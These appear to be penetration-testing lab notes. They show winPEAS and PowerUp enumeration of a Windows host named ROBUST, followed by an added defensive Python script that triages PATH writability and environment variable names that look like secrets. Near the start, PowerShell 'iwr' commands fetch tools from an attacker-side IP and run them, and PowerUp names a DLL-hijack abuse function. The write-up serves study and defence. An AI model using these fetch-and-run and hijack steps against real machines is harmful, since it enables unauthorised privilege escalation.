PEAS
Running automated enumeration with winPEAS after the manual enumeration of the ROBUST host.
PS C:\Users\Jeff> iwr -Uri http://192.168.45.182/winPEASany.exe -OutFile .\winPEASany.exe
Delivery complete
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
SystemDrive: C:
ProgramFiles(x86): C:\Program Files (x86)
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps;
ProgramW6432: C:\Program Files
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
TMP: C:\Users\Jeff\AppData\Local\Temp
PROCESSOR_ARCHITECTURE: AMD64
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_REVISION: 0101
TEMP: C:\Users\Jeff\AppData\Local\Temp
USERPROFILE: C:\Users\Jeff
USER: jeff
TERM: xterm-256color
USERNAME: jeff
SystemRoot: C:\WINDOWS
OneDrive: C:\Users\Jeff\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
LOGNAME: jeff
ProgramData: C:\ProgramData
HOMEPATH: \Users\Jeff
COMPUTERNAME: ROBUST
ALLUSERSPROFILE: C:\ProgramData
SSH_CONNECTION: 192.168.45.182 57272 192.168.107.200 22
SHELL: c:\windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
HOMEDRIVE: C:
windir: C:\WINDOWS
NUMBER_OF_PROCESSORS: 2
OS: Windows_NT
ProgramFiles: C:\Program Files
ComSpec: C:\WINDOWS\system32\cmd.exe
HOME: C:\Users\Jeff
PSModulePath: C:\Users\Jeff\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROMPT: jeff@ROBUST $P$G
SSH_CLIENT: 192.168.45.182 57272 22
APPDATA: C:\Users\Jeff\AppData\Roaming
USERDOMAIN: WORKGROUP
PROCESSOR_LEVEL: 25
LOCALAPPDATA: C:\Users\Jeff\AppData\Local
CommonProgramW6432: C:\Program Files\Common Files
SSH_TTY: windows-pty
PSExecutionPolicyPreference: Bypass
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
PUBLIC: C:\Users\Public
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
N/A
UAC
PowerShell
C:\Users\Jeff\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NTLM
Token Privileges
PowerUp
PS C:\Users\Jeff> iwr -Uri http://192.168.45.182/PowerUp.ps1 -OutFile .\PowerUp.ps1
Delivery complete
PS C:\Users\Jeff> . .\PowerUp.ps1
PS C:\Users\Jeff> Invoke-AllChecks
Get-WmiObject : Access denied
ModifiablePath : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
IdentityReference : ROBUST\Jeff
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll
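The winPEAS ENV section above and PowerUp's "%PATH% .dll Hijacks" finding come down to two questions a reviewer asks of environment data: do any variable names look like they hold secrets, and does any PATH entry sit somewhere the logged-on user can write to, and in which scope (user-only, or the machine-wide PATH that services and other principals also search). The Python script below is an added example, not part of these notes nor of the winPEAS or PowerUp projects. It parses winPEAS-style `Key: value` lines (a trimmed copy of the page's ENV output is embedded as constructed sample input, with one constructed `DB_PASSWORD` variable added so the name check has something to find) and infers writability from location prefixes taken from the user's own variables (USERPROFILE, TEMP, TMP, LOCALAPPDATA, APPDATA). That is a triage heuristic; PowerUp confirms writability by reading the directory ACL, which is what the finding above shows. All function and variable names are my own.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample input: a trimmed copy of the page's winPEAS ENV output, plus one
# constructed variable (DB_PASSWORD) that is not on the page, added to exercise the name check.
USER_ENV_TEXT = r"""
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Jeff\AppData\Local\Microsoft\WindowsApps;
TMP: C:\Users\Jeff\AppData\Local\Temp
TEMP: C:\Users\Jeff\AppData\Local\Temp
USERPROFILE: C:\Users\Jeff
USERNAME: jeff
DB_PASSWORD: constructed-sample-value
"""

SYSTEM_ENV_TEXT = r"""
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
"""

# A winPEAS env line is "Name: value"; the box-drawing header lines do not match.
ENV_LINE_RE = re.compile(r"^([A-Za-z_][\w().-]*):\s*(.*)$")
# Variable names worth a second look (heuristic; tune to the environment under review).
SECRET_NAME_RE = re.compile(r"(PASS|PWD|SECRET|TOKEN|API[_-]?KEY|PRIVATE|CRED)", re.IGNORECASE)


def parse_env(text: str) -> Dict[str, str]:
    """Turn winPEAS-style 'Key: value' lines into a dict, skipping headers and blanks."""
    env: Dict[str, str] = {}
    for raw in text.splitlines():
        m = ENV_LINE_RE.match(raw.strip())
        if m:
            env[m.group(1)] = m.group(2).strip()
    return env


def split_path(value: str) -> List[str]:
    """Split a Windows PATH value; drop empty entries and trailing backslashes."""
    return [e.strip().rstrip("\\") for e in value.split(";") if e.strip()]


def secret_like_names(env: Dict[str, str]) -> List[str]:
    """Variable names whose spelling suggests a credential is stored in them."""
    return sorted(k for k in env if SECRET_NAME_RE.search(k))


def user_controlled_prefixes(user_env: Dict[str, str]) -> List[str]:
    """Directories the logged-on user can write to, taken from the user's own variables."""
    names = ("USERPROFILE", "TEMP", "TMP", "LOCALAPPDATA", "APPDATA")
    return sorted({user_env[n].rstrip("\\").lower() for n in names if n in user_env})


def under_any(path: str, prefixes: List[str]) -> bool:
    """Case-insensitive 'path is one of, or lies below, one of prefixes'."""
    p = path.lower()
    return any(p == pre or p.startswith(pre + "\\") for pre in prefixes)


def triage(user_env: Dict[str, str], system_env: Dict[str, str]) -> Dict[str, list]:
    """Report secret-looking names and user-writable PATH entries per scope.

    Each PATH hit is (search-order position, entry); position 0 is searched first.
    A hit in the system-scope PATH is the serious case: every process that inherits the
    machine-wide environment, services included, would search a directory the user controls.
    """
    prefixes = user_controlled_prefixes(user_env)
    user_path = split_path(user_env.get("Path", ""))
    system_path = split_path(system_env.get("Path", ""))
    return {
        "secret_like_names": sorted(set(secret_like_names(user_env)) | set(secret_like_names(system_env))),
        "user_scope_writable": [(i, e) for i, e in enumerate(user_path) if under_any(e, prefixes)],
        "system_scope_writable": [(i, e) for i, e in enumerate(system_path) if under_any(e, prefixes)],
    }


if __name__ == "__main__":
    report = triage(parse_env(USER_ENV_TEXT), parse_env(SYSTEM_ENV_TEXT))
    for key, hits in report.items():
        print(f"{key}: {hits if hits else 'none'}")
```

Run against the page's data, the only user-writable PATH entry is the per-user WindowsApps directory, in the user-scope PATH only and in the last search position; the system-scope PATH contains no user-controlled location. That distinction is the one to record in a report: the mitigation is to keep user-writable directories out of the machine-wide PATH and to audit the ACLs of every PATH entry, since a location-based heuristic like this one cannot see a loose ACL on a directory with an innocent-looking path.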